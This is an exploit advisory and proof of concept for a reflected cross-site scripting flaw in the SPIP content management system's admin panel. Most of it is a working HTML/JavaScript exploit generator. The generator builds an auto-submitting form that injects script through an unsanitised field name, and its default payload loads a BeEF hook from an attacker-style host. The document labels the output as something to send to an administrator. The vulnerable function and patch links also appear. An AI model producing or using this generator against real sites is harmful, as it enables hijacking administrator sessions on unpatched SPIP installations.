SPIP Core versions below and equal to 3.0.1, 2,1.14, and 2.0.19 suffer from a cross site scripting vulnerability in the administrative panel.
# Exploit Title: SPIP Core <= 3.0.1, 2.1.14, 2.0.19 XSS admin panel
# Google Dork:
# Date: 13/06/2012
# Exploit Author: x@s
# Vendor Homepage: http://www.spip.net/
# Software Link: http://www.spip.net/
# Version: <= 3.0.1, 2.1.14 or 2.0.19
# Tested on: Firefox 13
Affected file:
Vuln function:
function copy_request($script, $suite, $submit='')
foreach(array_merge($_POST,$_GET) as $n => $c) {
if (!in_array($n,array('fichier','exec','validation_admin')) AND !is_array($c))
$suite .= "\n<input type='hidden' name='$n' value='" .
entites_html($c) .
"' />";
return generer_form_ecrire($script, $suite, '', $submit);
The variable $n isn't sanitized before being reinjected into the form generated.
Magic_quote_gcp should be disabled.
Compatible with Firefox 13 but not Chrome.
Exploit generator:
function trim(s){
return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,'');
function encodeToHex(s){
var r="";
var h;
for(var c=0;c<s.length;c++){
while(h.length<3) h="%"+h;
return r;
function generateXSS(){
var target = trim(document.getElementById("target").value);
var version = trim(document.getElementById("version").value);
var content = trim(document.getElementById("content").value);
var resultjs = "";
resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>";
resultjs += "<input type='hidden' name='exec' value='" + version + "' />";
resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />";
resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>";
document.getElementById("resultjs").value = resultjs;
<body onload="generateXSS();">
<h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2>
This XSS, non-persistent, use POST vars through admin panel.<br />
The target is the attribute "name" of an input markup hidden.<br />
This XSS work on Firefox 13, IE7, but doesn't work on Chrome.<br />
Magic_quote_gcp = Off needed.
<form action="" onsubmit="generateXSS();return false;">
<td>URL's SPIP Targeted :</td>
<td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td>
<td>SPIP version :</td>
<select id="version" onchange="generateXSS();">
<option value="base_repair">3.0.X (up to 3.0.1 included)</option>
<option value="admin_repair">2.1.X (up to 2.1.14 included)</option>
<td>JavaScript code to execute :<br />(without <script> & </script> markup)</td>
<textarea cols="70" rows="10" id="content" onkeyup="generateXSS();">
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ha.ck.er.xxx/beEf.js";
<td>Exploit to send to an admin : </td>
<textarea cols="70" rows="10" id="resultjs" readonly="readonly"></textarea>
SPIP 2.0.X (up to 2.0.20) : http://core.spip.org/projects/spip/repository/revisions/19558
SPIP 2.1.X (up to 2.1.15) : http://core.spip.org/projects/spip/repository/revisions/19559
SPIP 3.0.X (up to 3.0.2) : http://core.spip.org/projects/spip/repository/revisions/19560
ASafety - x@s - http://blog.asafety.fr/vuln-exploit-poc/xss-spip-core/